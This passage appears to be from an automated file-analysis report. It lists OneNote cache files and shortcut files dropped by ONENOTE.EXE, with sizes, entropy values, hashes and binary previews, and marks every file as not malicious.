                                                                                                                                                                                                              SHA-512:2A24C1ED7E9C22ABB1499CD09883D975BFEC043F017E1040A8E45FE13369F13F938FBFAB93DDC6AB38BFF3330DB3FBE520B7BB38410D6E749F6E523D88DF0270
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_9.W.n1F.....Ex.................?.....I........................................................................N.H...C....x-...H.....................h...........................`.....................M....J7.........3..Z..^A..]r's.x............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5040
                                                                                                                                                                                                              Entropy (8bit):1.0493283796714252
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Ra9txF9YyfHj9shUnSxivfFFBtcZtfMW6/BpJdCTNXIxAS:Y9tz9YyfHJ7SxivVtBpTuCAS
                                                                                                                                                                                                              MD5:AD222B5B3A1AA3C17A6E5D19F738834B
                                                                                                                                                                                                              SHA1:D7237BBB6B459140B5787227F5466830D47A6946
                                                                                                                                                                                                              SHA-256:5D2CB67D3317FD05C231A023DD0C745EC48E21C9957B9E3143C6A3ECA8B8BFEB
                                                                                                                                                                                                              SHA-512:D4FFB6445812C842870417F7B20532CF65D79AFF60A04A476F365A488FD2DE78D34C83783C22D1401CF1A1000DAEC480B105588A5A76205E604FB65FDC391BB6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_..$..,DH..|t.[..................?.....I.......................................................................?..+hwyF...F..A.......................h............................................=c.09PG.I^T..U..........g....SO....H..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                                              Entropy (8bit):1.2308743643244564
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Ra1XYyfiXUXc2l+FFBtGh2Wn+J/ZX9iIaFuOXIxASDk1ctxF+flY4gqw1lrnIB:Y1XYyfFf6tG4fLXIPCAScctz+flvOe
                                                                                                                                                                                                              MD5:4EE2FDB617128A56E09B544E9D48C9AA
                                                                                                                                                                                                              SHA1:779D0156C775E7CE9070DD151DAF77FA9CA91EF3
                                                                                                                                                                                                              SHA-256:E91534B2478721CE67A6465055F446140C26E6970898AE2DF7ED53A86865FBCD
                                                                                                                                                                                                              SHA-512:B8D612FA8DE73D032A519B2FDFBD7130CEB104A1832C1FE75F554FD58D9335943D341D0E32FD6CE8009525825710BACD8E6876E2B8CD8146A3CB370A71DDF645
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_?..+hwyF...F..................?.....I.......................................................................9.W.n1F.....Ex....}....................h...........................................G..Ib..M....U...........u...EI.v@`................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5040
                                                                                                                                                                                                              Entropy (8bit):1.0409156746598764
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Ra1eYyfHjIUnSmqAzfFFBtIaA2TZ2/2W6/OQ2zXnV2/eFUiEDXIxAS:Y1eYyfHHSuZtIaAym2sQUnVmEQCAS
                                                                                                                                                                                                              MD5:16911F2FB2AAD8A8D0A5C2607CE5095C
                                                                                                                                                                                                              SHA1:25C266AC05EE0B28876778C1F1F287BA2C72FE35
                                                                                                                                                                                                              SHA-256:4F9C8E819B92CC37F371723D4DD7D31B4175BF70FE3E010CF831EB5160E11ED0
                                                                                                                                                                                                              SHA-512:FD8275A573FB2B6F6673874AE3ED654F55A1C051597F0A95AA1B04B2AF73135AAE0D13F6C92B8726E21B69D5D09F67B6AF0B5CB3AD2D39D505F02B99C787EB36
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_!.#..R5@.%P.0.%.................?.....I.......................................................................9.W.n1F.....Ex.F..6....................h...........................................wh....K.[.Z...'........{....+.@...%..p.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5040
                                                                                                                                                                                                              Entropy (8bit):1.038177910152304
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Ra4satYyfHj+4jqLhUnSF9w/NFFBtNs7ZGW6/dCZrVwhHjo1XIxAS:YmYyfH86SFutS7QvC9VODECAS
                                                                                                                                                                                                              MD5:55419A6FAF1A2A1F0E1A416D10712FDC
                                                                                                                                                                                                              SHA1:26557114C603A4CF60D849F1B423F4F4EE6A644C
                                                                                                                                                                                                              SHA-256:17EB5623882F8CB9CA04E6A694E332E16521AF7BE174E707720705606E534BCF
                                                                                                                                                                                                              SHA-512:19C9F32913010FB12B4FAB4A4D168835935FDBF6C4E353968B2910E75C6F359164B6E815943C0184114A78A0629E06E9F281E8334731E34F5F7C1ADD93ACBF65
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_...k..A..d....k................?.....I.........................................................................Wu...G..... A7A.......................h...........................................s...RJ.A..................3".nL...<................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                                              Entropy (8bit):1.2317881746240953
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RaozCFYyfiXKUXWJR3kFFBtdWn+J/BALphQ1XIxASDk1sxll9bw0zFOnIB:Yo2FYyfClmKtdfDKhICAScUl9bxpOe
                                                                                                                                                                                                              MD5:1845CC00EBE2B1BDA4424C800CC67766
                                                                                                                                                                                                              SHA1:35CC7EA0307C5078004F334EBCED9664F2F79FA3
                                                                                                                                                                                                              SHA-256:E5BB4AF480E3E84C18AD36C26FAE6FAD7AF54E543144F8DB43A1AB511F41C7EE
                                                                                                                                                                                                              SHA-512:1CAEDFD216B08E3DD318F94B4FFF1B116315A35A653251995773E2DE46E7C202C08DE839557A3EA827F206FA6D02086124379EED0717EDCD1D0CD2D4B150915F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_..Wu...G..... A7................?.....I.......................................................................9.W.n1F.....Ex........................h...........................................t.T...\I...d.............K...P.K.#/.q.R.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6208
                                                                                                                                                                                                              Entropy (8bit):1.307209739052853
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:YW2CVttYyf5Cpxk9tw4i2Q5n++qgbOIYnKCAStdE8DTlBbMOi4++n:N2CVttn5CpxRf2+n+3gbO/j1BgOiRu
                                                                                                                                                                                                              MD5:CBF7F4CB1E5BB319DB8AB66A2C497242
                                                                                                                                                                                                              SHA1:05E1692EE44E815FDF792A78890B463F6FF4A627
                                                                                                                                                                                                              SHA-256:07F19E383B21D81B2C8F453F3D3FE9B4137B966464D2EDAD92C37FC762489C73
                                                                                                                                                                                                              SHA-512:79D5B8F7D830ED9AA4FEFA5C764AF7DFF64AA25C98024F78716D8695FBEBE79F85795D52285CB0B7E832F444866162FD94583E7A301499DA6E0B61A5C982335B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_.N.H...C....x-.................?.....I........................................................................~.....K.}}b...........................h...........................@................."..{AJ..p..I"...........p`P.nJ.1..H..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5040
                                                                                                                                                                                                              Entropy (8bit):1.0371809123413192
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RaUjYyfHjet/iEcYLhUnSIYyiSFFBtF3W6/aBtL+zaGCXIxAS:YUjYyfHA/1cY6SIkEtF3Ot6zOCAS
                                                                                                                                                                                                              MD5:0E326B2E2484ACFD3360F012EF66C69D
                                                                                                                                                                                                              SHA1:B1D81A78E317DFB03698EB60A1F2D2E1023E3002
                                                                                                                                                                                                              SHA-256:2B2394FFAB94D394A14B20C3B9E82951E63A0864CCC547F8056CD1E35DC18AAF
                                                                                                                                                                                                              SHA-512:554F10B1691F99EE86E7ABB1DA97CE66FC575C71BAC62FE94C0A7126B3EB22C91ABB618D6012059078FA42D03622B821CFDF57599BC87C62E8E0E66C530B87D5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_....6..K.$Nl^...................?.....I........................................................................4.r..B....a=.hA.......................h............................................s*.[PEA......e.........l=B.2.jO..x................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                                              Entropy (8bit):1.2224134401410611
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:Yf1XjYyf5Sw/tqGdfuXZoQ+j46CASc6vflVMnOvZFe:E1XjnEwAGd2XZsj4TrffOOvm
                                                                                                                                                                                                              MD5:221D75BC0F74A21ACBB20DE21FC607B1
                                                                                                                                                                                                              SHA1:1363E2B20765DA6845454437357993CD0215855C
                                                                                                                                                                                                              SHA-256:3B8A97615653C16D5AFE2BEFBBAD77FEA2DE8CC090B107DF1B6E2ED5DBC676E6
                                                                                                                                                                                                              SHA-512:221BBF7FA0212F15890C0994FE383EC097555EDCD924E9D07C9CAAAF3B557A03C570DE581BB0DC299BF071AAE796FE1FC962F1AD0BED698F9D8D427A50C9DBD2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_.4.r..B....a=.h................?.....I.......................................................................i_Yb.`%K...)A...!wY....................h............................................,..x.N...c...e...............M..Du..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6496
                                                                                                                                                                                                              Entropy (8bit):1.518479164524365
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:7fn7CVcOciONINGjNrINnJY4lDN21jE/1Om:7zCzToimmCk2hmEm
                                                                                                                                                                                                              MD5:F3D4A552381E5FBF20D07CF1C823F3BD
                                                                                                                                                                                                              SHA1:FFFC9CF853895A2D2A27F899AEFB1E09C97DCFDB
                                                                                                                                                                                                              SHA-256:8239DF8037F754FB124D312FE7883D8E7DB092926C594D5341F863F5BE8B88CE
                                                                                                                                                                                                              SHA-512:11232A4AD6B12864BCD8EFC1FBBEEAA489BC123747206241EB9DCA13B0019E2715E03ED4865B6032891639411AE196E694CA2917EF3C7A1D7FD764A21A0D693D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_i_Yb.`%K...)A..................?.....I........................................................................N.H...C....x-..Eg.....................h...........................`...............W&SX.&.O...[................^iB.....Em............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5040
                                                                                                                                                                                                              Entropy (8bit):1.0444564670129217
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RacYyfHj8IxhUnSuM5Q4FFBtkTAEcTs2W6/qgTAX1Ts6fBwZpXIxAS:YcYyfHaS3Q2tkkEctr0X1ZBw7CAS
                                                                                                                                                                                                              MD5:38DA100F104A0887FC74E08269D74694
                                                                                                                                                                                                              SHA1:CAAD9475D30EB3E224EB6EAEFB96E01764C86D87
                                                                                                                                                                                                              SHA-256:9F401CE0BFE3A1F0F08AB4535941939C3CA6126277D438F74771E2066BE1E894
                                                                                                                                                                                                              SHA-512:CDA4D0FD97FF904C359DFE2DA79A1E306581EC61D91AA8BF15621CF8CA4ECFCBD0D8C24286C365823E5D05842AE075C69CC6610516EE616641D975B63EE08683
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_...].x.H..p.....................?.....I.......................................................................t.@j..C.{..R%..A.......................h..................................................N...;..\s...............J.'...V.,............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                                              Entropy (8bit):1.2390504787737922
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:YwbYyf5K+VstBfFwe2yIUCAScalhW5L8Je:FbncWE9WyIFN/a4c
                                                                                                                                                                                                              MD5:A737A2F58A63DFC0AB87907720ED55A0
                                                                                                                                                                                                              SHA1:2F5129473E6978368AEB39F426ED1938469CA7BA
                                                                                                                                                                                                              SHA-256:D73D463372EDE8C9E54715116C57BDE7A66F5F8B79833A03532F044F44DBE8F6
                                                                                                                                                                                                              SHA-512:901688AD7FBF6623C7C18C8703F1EE4E4FA410EAE5625443BFAB1B77B3BBF883BCBB38DE8524510814E7573C25BC4A52379F3C9EE8C5F5C8E0BD355E2C50D1EE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_t.@j..C.{..R%..................?.....I.......................................................................i_Yb.`%K...)A.....}....................h.............................................goX.D.&<.MIu..........].-...N.].7.m..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5040
                                                                                                                                                                                                              Entropy (8bit):1.0390246619648607
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RaApvFYyfHjomUnSNFx/GhXFFBtKIW6/RV5QlZnVGXIxAS:YiFYyfHsxSNFZotKIXV5QlZn4CAS
                                                                                                                                                                                                              MD5:7A418B3DC44119E68DEB0E516A5905D2
                                                                                                                                                                                                              SHA1:55AF43D441F7953A4612204E82C4700B81CA4F94
                                                                                                                                                                                                              SHA-256:8E6B297F697FE3B8703880532A17DDCD989BFDF4108C464BBF88BD1B1ECBBB63
                                                                                                                                                                                                              SHA-512:99ABF96754BF38588DE19D106B6A2CD9F4C4652617BD95197BB804FD2F063C0ECEB1F7D6F55D4D21F542796F39DCB9FC74E6A94BA9C5D1149BE7200ADBE443B5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_b.c..<.J..I.R...................?.....I.......................................................................i_Yb.`%K...)A..F..6....................h...........................................{..g...J..P...l.......... W8.!UN...................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5040
                                                                                                                                                                                                              Entropy (8bit):1.0446688670810755
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RaE+hYyfHjfdhUnSl9p6FFBtRaAW6/cN0E/8GoXIxAS:YPYyfHjQS58tRaAuN0E/8XCAS
                                                                                                                                                                                                              MD5:D9F0726751C969F3CE84E12DD0BBE572
                                                                                                                                                                                                              SHA1:01AB001CA4814A470E4D9E9E9DAB32F17A1F44EB
                                                                                                                                                                                                              SHA-256:FC955F721BF78837829E64344DF9C54A3F4F6A26512515C8ED31BC557996E288
                                                                                                                                                                                                              SHA-512:27E020A8D931C6B29DDBA97E65F4B0803A86C257E374D6DAC3C63BC9E35E55233C1A3BCE2673BC9887191C827F9EF2F8A3E138281E5006DC1F14E7878B679DCD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_..$.pI.H...m`..k................?.....I.......................................................................W.4..=8I.-.....A.......................h...........................................*...~..O..1:...z........f._....E..X.NO6.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                                              Entropy (8bit):1.2259416119509938
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:YAYyf5Vl++tWhVeV5f9VSfV/i/93UCASc7VlHaBe:/nvl+eGpy9V6VNaE
                                                                                                                                                                                                              MD5:E2F8B996EB24E77BE4F3071449AAB826
                                                                                                                                                                                                              SHA1:FD2032F04F32DEB82A5D74EC160509F6AD142562
                                                                                                                                                                                                              SHA-256:333E63D8B7D6FF8BA5EF5C4135DCD7215DCD5E572CAC398B04C376F82972EB1A
                                                                                                                                                                                                              SHA-512:EFFCDEE030756CEB1D001BE0C979AFDF7BD0696D6225F4187304053F7F4A90C4B20570DA507EF665FF2D30AF8D2415C4875ACD048ADB8007C6CA00654327B4CD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_W.4..=8I.-.....................?.....I.......................................................................i_Yb.`%K...)A.........................h.............................................@...NB..W.L..s........93q...oL.....#Z^............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                                              Entropy (8bit):1.2388537816971923
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:YBYyfaIBQ6ytBrkcfQZ3qQJCAScCCV8O68Re:mna48kcoZ3qQ0dCVf6l
                                                                                                                                                                                                              MD5:9F2FEC11B93D342BABEE49D94883C133
                                                                                                                                                                                                              SHA1:02C40B6C39142D45B8EDA1C35591EEF720897E09
                                                                                                                                                                                                              SHA-256:DADF53FB852DC8E5C7DEFE45A018EB1D1AB8EA3284F9F0DD46C2FA96BD25B0F3
                                                                                                                                                                                                              SHA-512:577DDECA3EA1A086943D93BF27D3BE23971F0B04CE406609D855E23E626EE2C373E48A8AA5994E4A8482B7FD1A64E7F64A3A2F13B440F8F2EE03840F901CC9A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_.~.....K.}}b....................?.....I.......................................................................mq.....H.c.cw._....7....................h...........................................u......C.r................1S..M..E.................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6168
                                                                                                                                                                                                              Entropy (8bit):1.2182608226133294
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RazmPYyfi/UPvXnFFBt6R2Wn+J/aeXtJz2QZBXIxASh1PtCDwVHHAiYJMn5scvCe:YaPYyf1Ntg2fjtJaQvCASPnVH2Mt
                                                                                                                                                                                                              MD5:AE7816B8C533AFAC42518AB82AE6B0A2
                                                                                                                                                                                                              SHA1:2606D05ADD7CC28155CB2148F10D2E9FCA89AAC9
                                                                                                                                                                                                              SHA-256:34E56856704CD19A5F3B970634F02481C1194DFEB7A093D9F4A9838091C38E13
                                                                                                                                                                                                              SHA-512:0A07DEB2E924F57E7552870B66C1281EA680560E3998FDA3F08B7C536679803E1F46D3EF21CF6B7A793B89741AEDD216E4255E3CE892C4C792926FCD074E0839
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_mq.....H.c.cw._.................?.....I...............................................................................................................h...........................................8..B..A..T..Vc.........n..r..F...#}.+z............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4011
                                                                                                                                                                                                              Entropy (8bit):3.5337035843187703
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:XvQdVfJy8MCfMdN5DMJC5fjdiOdVfJAy8B6/ckydNZGcG7CZuzS/gA:Xyf4oWMYEgfJHh59j4/
                                                                                                                                                                                                              MD5:EE4572607C3C074A5556927361B07295
                                                                                                                                                                                                              SHA1:DE69C5126E3C12133D075FE6E3D7595C409E7ABE
                                                                                                                                                                                                              SHA-256:5A9C9FC20557C12BA4AB40635785DBDD267910B39AB1038C200F2DA328073EFC
                                                                                                                                                                                                              SHA-512:2FAC6DEFB6FA715A81E6EBDF87EDD89AEBF30CCF63ECA748D8EACEE12FD5558343615576580CC62CFD59E8C248D79B4DFBAB1B73EC04EFD22D15E87252A60E87
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...................................FL..................F.@.. ...../.....t..#-;..../.....H]$...................../....P.O. .:i.....+00.../C:\.....................1.....6Sto..PROGRA~1..t......O.IGV.......o..............J.......4.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1.....6S.S..MICROS~2..R......6S.S6S.S....y2........................M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1.....6S.S..root..:......6S.SGV......"....................x...r.o.o.t.....Z.1.....6S.S..Office16..B......6S.SGV......@1.....................D..O.f.f.i.c.e.1.6.....b.2.H]$.6S.S .ONENOTE.EXE.H......6S.SGV.......!.....................p..O.N.E.N.O.T.E...E.X.E.......j...............-.......i...........[........C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .A.l.t. .+. .N.).../.s.i.d.e.n.o.t.e.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.R.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\R
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4011
                                                                                                                                                                                                              Entropy (8bit):3.5337035843187703
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:XvQdVfJy8MCfMdN5DMJC5fjdiOdVfJAy8B6/ckydNZGcG7CZuzS/gA:Xyf4oWMYEgfJHh59j4/
                                                                                                                                                                                                              MD5:EE4572607C3C074A5556927361B07295
                                                                                                                                                                                                              SHA1:DE69C5126E3C12133D075FE6E3D7595C409E7ABE
                                                                                                                                                                                                              SHA-256:5A9C9FC20557C12BA4AB40635785DBDD267910B39AB1038C200F2DA328073EFC
                                                                                                                                                                                                              SHA-512:2FAC6DEFB6FA715A81E6EBDF87EDD89AEBF30CCF63ECA748D8EACEE12FD5558343615576580CC62CFD59E8C248D79B4DFBAB1B73EC04EFD22D15E87252A60E87
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...................................FL..................F.@.. ...../.....t..#-;..../.....H]$...................../....P.O. .:i.....+00.../C:\.....................1.....6Sto..PROGRA~1..t......O.IGV.......o..............J.......4.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1.....6S.S..MICROS~2..R......6S.S6S.S....y2........................M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1.....6S.S..root..:......6S.SGV......"....................x...r.o.o.t.....Z.1.....6S.S..Office16..B......6S.SGV......@1.....................D..O.f.f.i.c.e.1.6.....b.2.H]$.6S.S .ONENOTE.EXE.H......6S.SGV.......!.....................p..O.N.E.N.O.T.E...E.X.E.......j...............-.......i...........[........C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .A.l.t. .+. .N.).../.s.i.d.e.n.o.t.e.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.R.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\R
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4011
                                                                                                                                                                                                              Entropy (8bit):3.5337035843187703
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:XvQdVfJy8MCfMdN5DMJC5fjdiOdVfJAy8B6/ckydNZGcG7CZuzS/gA:Xyf4oWMYEgfJHh59j4/
                                                                                                                                                                                                              MD5:EE4572607C3C074A5556927361B07295
                                                                                                                                                                                                              SHA1:DE69C5126E3C12133D075FE6E3D7595C409E7ABE
                                                                                                                                                                                                              SHA-256:5A9C9FC20557C12BA4AB40635785DBDD267910B39AB1038C200F2DA328073EFC
                                                                                                                                                                                                              SHA-512:2FAC6DEFB6FA715A81E6EBDF87EDD89AEBF30CCF63ECA748D8EACEE12FD5558343615576580CC62CFD59E8C248D79B4DFBAB1B73EC04EFD22D15E87252A60E87
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...................................FL..................F.@.. ...../.....t..#-;..../.....H]$...................../....P.O. .:i.....+00.../C:\.....................1.....6Sto..PROGRA~1..t......O.IGV.......o..............J.......4.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1.....6S.S..MICROS~2..R......6S.S6S.S....y2........................M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1.....6S.S..root..:......6S.SGV......"....................x...r.o.o.t.....Z.1.....6S.S..Office16..B......6S.SGV......@1.....................D..O.f.f.i.c.e.1.6.....b.2.H]$.6S.S .ONENOTE.EXE.H......6S.SGV.......!.....................p..O.N.E.N.O.T.E...E.X.E.......j...............-.......i...........[........C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .A.l.t. .+. .N.).../.s.i.d.e.n.o.t.e.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.R.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\R
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Matlab v4 mat-file (little endian) \253\373\277\272, sparse, rows 1, columns 0, imaginary
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                              Entropy (8bit):2.163890986728065
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:/lklT8OFf:CT8Ol
                                                                                                                                                                                                              MD5:4FCB2A3EE025E4A10D21E1B154873FE2
                                                                                                                                                                                                              SHA1:57658E2FA594B7D0B99D02E041D0F3418E58856B
